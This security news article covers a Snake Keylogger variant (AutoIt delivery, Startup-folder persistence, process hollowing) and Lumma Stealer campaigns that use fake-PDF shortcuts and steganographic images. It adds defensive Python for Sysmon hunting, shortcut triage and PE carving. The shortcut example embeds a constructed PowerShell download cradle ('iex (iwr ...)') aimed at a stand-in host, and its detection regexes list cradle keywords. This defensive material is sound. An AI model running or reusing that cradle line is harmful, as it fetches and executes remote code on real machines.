A new variant of the Snake Keylogger malware is being used to actively target Windows users located in China, Turkey, Indonesia, Taiwan and Spain.
Fortinet FortiGuard Labs said the new version of the malware has been behind more than 280 million blocked infection attempts worldwide since the start of the year.
“Typically delivered through phishing emails containing malicious attachments or links, Snake Keylogger is designed to steal sensitive information from popular web browsers such as Chrome, Edge and Firefox by logging keystrokes, capturing credentials and monitoring the clipboard,” security researcher Kevin Su said.
“Its additional capabilities allow it to exfiltrate the stolen information to an attacker-controlled server using the Simple Mail Transfer Protocol (SMTP), allowing the threat actor to access the stolen credentials and other sensitive data.”
What is notable about the latest set of attacks is that it uses the AutoIt scripting language to deliver and execute the main payload. In other words, the file carrying the malware is an AutoIt-compiled binary, which helps it slip past traditional detection mechanisms.
“The use of AutoIt not only complicates static analysis by embedding the payload within the compiled script, but also enables dynamic behavior that mimics benign automation tools,” Su added.
Once launched, Snake Keylogger drops a copy of itself to a file named “ageless.exe” in the folder “%LOCALAPPDATA%\supergroup”. It also drops a second file called “ageless.vbs” in the Windows Startup folder so that the Visual Basic Script (VBS) automatically launches the malware whenever the system is rebooted.
Through this persistence mechanism, Snake Keylogger is able to maintain access to the compromised system and relaunch its payload even if the associated process is terminated.
The attack chain culminates with the injection of the main payload into a legitimate .NET process such as “regsvcs.exe” using a technique called process hollowing, which lets the malicious code run under the name of a trusted process and evade detection.
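The drop path, the Startup-folder script and the argument-less regsvcs.exe launch described above are all visible in endpoint telemetry. The following Python is an added hunting example, not Fortinet's detection logic or code from this article: it runs three rules over constructed Sysmon-style JSON events (EventID 11 FileCreate, EventID 1 ProcessCreate). The file names come from the article; the Startup-folder rule is deliberately broader than ageless.vbs and catches any script or shortcut written there, and the parent-process allow-list (Windows and Program Files trees) is an assumption to tune for your own estate.

```python
"""Hunt for Snake Keylogger drop, persistence and hollowing artefacts in Sysmon-style events."""
import json
import re

# Constructed sample telemetry (not real logs), shaped like Sysmon EventID 11 (FileCreate)
# and EventID 1 (ProcessCreate) records exported as one JSON object per line.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventID": 11, "Image": r"C:\Users\alice\Downloads\invoice.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\supergroup\ageless.exe"},
    {"EventID": 11, "Image": r"C:\Users\alice\Downloads\invoice.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\supergroup\ageless.exe"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe",
     "CommandLine": r"regsvcs.exe /nologo MyComponent.dll",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
])

# The exact drop path reported for this variant.
DROP_PATH = re.compile(r"\\AppData\\Local\\supergroup\\ageless\.exe$", re.I)
# Any script or shortcut written to the per-user Startup folder deserves review, not only ageless.vbs.
STARTUP_SCRIPT = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1|lnk)$", re.I)
# Hollowing heuristic: the .NET utility started with no arguments by a parent outside the
# Windows or Program Files trees. The allow-list is an assumption for this example.
HOLLOW_TARGET = re.compile(r"\\regsvcs\.exe$", re.I)
TRUSTED_PARENT = re.compile(r"^[A-Z]:\\(Windows|Program Files( \(x86\))?)\\", re.I)


def evaluate(event: dict) -> list:
    """Return the rule names an event triggers (empty list when nothing matched)."""
    hits = []
    if event.get("EventID") == 11:
        target = event.get("TargetFilename", "")
        if DROP_PATH.search(target):
            hits.append("snake_keylogger_drop_path")
        if STARTUP_SCRIPT.search(target):
            hits.append("script_written_to_startup_folder")
    elif event.get("EventID") == 1:
        image = event.get("Image", "")
        parent = event.get("ParentImage", "")
        argv = event.get("CommandLine", "").split()
        if HOLLOW_TARGET.search(image) and not TRUSTED_PARENT.match(parent) and len(argv) <= 1:
            hits.append("regsvcs_argless_from_untrusted_parent")
    return hits


def hunt(jsonl: str) -> list:
    """Scan newline-delimited JSON events; return (line_number, hits) for every alert."""
    alerts = []
    for n, line in enumerate(jsonl.splitlines(), 1):
        if not line.strip():
            continue
        hits = evaluate(json.loads(line))
        if hits:
            alerts.append((n, hits))
    return alerts


if __name__ == "__main__":
    for n, hits in hunt(SAMPLE_EVENTS):
        print(f"line {n}: {', '.join(hits)}")
```

The fourth sample event (regsvcs.exe started by MSBuild with a DLL argument) is the kind of legitimate use the parent allow-list and argument check are there to keep quiet; expect to extend that list before running the rule against production telemetry.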
Snake Keylogger has also been found to log keystrokes and to use sites such as checkip.dyndns[.]org to retrieve the victim's IP address and geolocation.
“To capture keystrokes, it uses the SetWindowsHookEx API with the first parameter set to WH_KEYBOARD_LL (flag 13), a low-level hook that monitors keystrokes,” Su said. “This technique allows the malware to log sensitive input such as banking credentials.”
The development comes as CloudSEK detailed a campaign that uses compromised infrastructure associated with educational institutions to distribute malicious LNK files disguised as PDF documents, ultimately deploying the Lumma Stealer malware.
The activity, which targets sectors such as finance, healthcare, technology and media, is a multi-stage attack sequence that leads to the theft of passwords, browser data and cryptocurrency wallets.
“The campaign's primary infection vector involves the use of malicious LNK (shortcut) files crafted to appear as legitimate PDF documents,” security researcher Sahariya said, adding that the files are hosted on a WebDAV server to which visitors of the compromised sites are redirected.
The LNK file, for its part, executes a PowerShell command that connects to a remote server and retrieves the next-stage malware, an obfuscated piece of JavaScript code that carries another PowerShell script, which in turn downloads Lumma Stealer from the same server and executes it.
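A shortcut that looks like a PDF but launches PowerShell has a recognisable shape on disk: a double extension, a script-host target, a download cradle in the arguments, a document-viewer icon and often a minimised window. The Python below is an added triage example, not CloudSEK's tooling or code from this article: it parses the fixed-size ShellLinkHeader and the StringData fields of the MS-SHLLINK format and scores those traits. The sample shortcut, its file name, the Acrobat icon path and the example.invalid URL are constructed for this example; the heuristics are assumptions, not the campaign's exact indicators.

```python
"""Parse a Windows shortcut (.lnk) and flag the document-lookalike-that-runs-PowerShell pattern."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # 00021401-0000-0000-C000-000000000046
# LinkFlags bits (MS-SHLLINK 2.1.1), low byte only.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = (
    1 << i for i in range(8))
SW_SHOWMINNOACTIVE = 7   # ShowCommand value that opens the target minimised

SCRIPT_HOST = re.compile(r"(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)(\.exe)?\b", re.I)
CRADLE = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|downloadfile|webclient|\biex\b|-enc|frombase64string|hidden|webdav)",
    re.I)
DOC_ICON = re.compile(r"acro|pdf|winword|excel", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields of a shell link."""
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_ID_LIST:                 # LinkTargetIDList: uint16 size, then the list
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:               # LinkInfo: uint32 total size including itself
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    enc, width = ("utf-16-le", 2) if flags & IS_UNICODE else ("cp1252", 1)
    info = {"show_command": show_cmd}
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_REL_PATH), ("working_dir", HAS_WORK_DIR),
                     ("arguments", HAS_ARGS), ("icon_location", HAS_ICON)):
        if flags & bit:                     # StringData: uint16 CountCharacters, then the string
            count, = struct.unpack_from("<H", data, pos)
            pos += 2
            info[key] = data[pos:pos + count * width].decode(enc)
            pos += count * width
    return info


def triage(filename: str, data: bytes) -> list:
    """Heuristic findings for a shortcut; an empty list means nothing stood out."""
    info = parse_lnk(data)
    target, args, icon = info.get("relative_path", ""), info.get("arguments", ""), info.get("icon_location", "")
    findings = []
    if DOUBLE_EXT.search(filename):
        findings.append("document-style name with hidden .lnk extension")
    launches_script_host = bool(SCRIPT_HOST.search(target))
    if launches_script_host:
        findings.append(f"target is a script host: {target}")
    if CRADLE.search(args):
        findings.append("download-cradle or window-hiding keywords in arguments")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window opens minimised (ShowCommand=7)")
    if launches_script_host and DOC_ICON.search(icon):
        findings.append("document-viewer icon on a script-launching shortcut")
    return findings


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Build a minimal shortcut for testing (empty IDList, no LinkInfo, Unicode strings)."""
    flags = HAS_ID_LIST | HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = struct.pack("<H", 2) + b"\x00\x00"          # IDList holding only the TerminalID
    for s in (relative_path, arguments, icon_location):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


# Constructed sample: a shortcut named like a PDF that actually runs a PowerShell download cradle.
SAMPLE_NAME = "Invoice.pdf.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -c \"iex (iwr 'http://files.example.invalid/stage2.js')\"",
    r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
)

if __name__ == "__main__":
    for finding in triage(SAMPLE_NAME, SAMPLE_LNK):
        print("-", finding)
```

Real shortcuts usually carry a LinkTargetIDList and a LinkInfo block before the strings; the parser skips both by their declared sizes, so it works on files pulled from a mailbox or a WebDAV share as well as on the synthetic sample.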
In recent weeks, the stealer malware has also been distributed via obfuscated JavaScript files to harvest a wide range of sensitive data from compromised Windows systems and exfiltrate it to an attacker-controlled Telegram bot.
“The attack begins with an obfuscated JavaScript file that retrieves encoded strings from an open-source service to execute a PowerShell script,” CYFIRMA said.
“This script then downloads a JPG image and a text file from an IP address and a URL, both of which contain malicious MZ DOS executables embedded using steganographic techniques. Once executed, these payloads deploy the stealer malware.”
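An executable hidden in an image can be found without knowing the attacker's encoding in advance: a PE has an "MZ" stub whose e_lfanew pointer at offset 0x3C must land on a "PE\0\0" signature, and a clean JPEG has nothing after its End-Of-Image marker. The Python below is an added example, not CYFIRMA's analysis code or code from this article: it walks the JPEG marker segments to find the true end of the image (rather than searching for the FF D9 byte pair, which can also appear inside the payload) and carves any PE header in the file. The sample JPEG and the PE stub are constructed; no real payload is used.

```python
"""Find PE executables appended to or embedded in a JPEG (or any carrier file)."""
import struct

JPEG_SOI = b"\xff\xd8"
# In entropy-coded data, FF is followed by 00 (byte stuffing) or D0..D7 (restart markers);
# any other byte after FF is a real marker and ends the scan data.
STUFFED_OR_RST = {0x00, *range(0xD0, 0xD8)}


def find_embedded_pe(blob: bytes) -> list:
    """Return (offset, e_lfanew, machine) for each byte range that parses as a PE image.
    A bare 'MZ' is not enough: e_lfanew at +0x3C must point at 'PE\\0\\0'."""
    hits, start = [], 0
    while (off := blob.find(b"MZ", start)) != -1:
        start = off + 1
        if off + 0x40 <= len(blob):
            e_lfanew, = struct.unpack_from("<I", blob, off + 0x3C)
            pe = off + e_lfanew
            if 0x40 <= e_lfanew <= 0x400 and pe + 6 <= len(blob) and blob[pe:pe + 4] == b"PE\x00\x00":
                machine, = struct.unpack_from("<H", blob, pe + 4)
                hits.append((off, e_lfanew, machine))
    return hits


def jpeg_end(blob: bytes) -> int:
    """Offset just past the EOI marker of the JPEG that starts at offset 0."""
    if not blob.startswith(JPEG_SOI):
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 2 <= len(blob) and blob[pos] == 0xFF:
        marker = blob[pos + 1]
        if marker == 0xD9:                                   # EOI
            return pos + 2
        if pos + 4 > len(blob):
            break
        seglen, = struct.unpack_from(">H", blob, pos + 2)   # APPn/DQT/SOF/DHT/SOS: big-endian length
        pos += 2 + seglen
        if marker == 0xDA:                                   # SOS: skip entropy-coded data to next marker
            while pos + 1 < len(blob):
                if blob[pos] == 0xFF and blob[pos + 1] not in STUFFED_OR_RST:
                    break
                pos += 1
    raise ValueError("truncated JPEG")


def analyse(blob: bytes) -> dict:
    """Report embedded PE headers and, for JPEGs, how many bytes trail the real end of image."""
    report = {"pe_headers": find_embedded_pe(blob), "bytes_after_jpeg": None}
    if blob.startswith(JPEG_SOI):
        try:
            report["bytes_after_jpeg"] = len(blob) - jpeg_end(blob)
        except ValueError:
            report["bytes_after_jpeg"] = -1                  # malformed: treat as suspicious
    return report


def build_sample_jpeg() -> bytes:
    """Constructed minimal JPEG: APP0, a tiny SOS segment, scan data with stuffing and a restart marker, EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78\x9a"
    return JPEG_SOI + app0 + sos + scan + b"\xff\xd9"


def build_pe_stub() -> bytes:
    """Constructed DOS stub plus COFF header (machine 0x14C, x86); not a runnable program."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\x00" * (e_lfanew - len(dos))
    return dos + b"PE\x00\x00" + struct.pack("<H", 0x014C) + b"\x00" * 18


SAMPLE_IMAGE = build_sample_jpeg() + build_pe_stub()   # the carrier with a PE appended after EOI

if __name__ == "__main__":
    print(analyse(SAMPLE_IMAGE))
```

Payloads are not always appended raw; when the carrier is a text file the same carve can be run over its base64- or hex-decoded contents, and an image whose trailing byte count is non-zero is worth a second look even when no PE header is found.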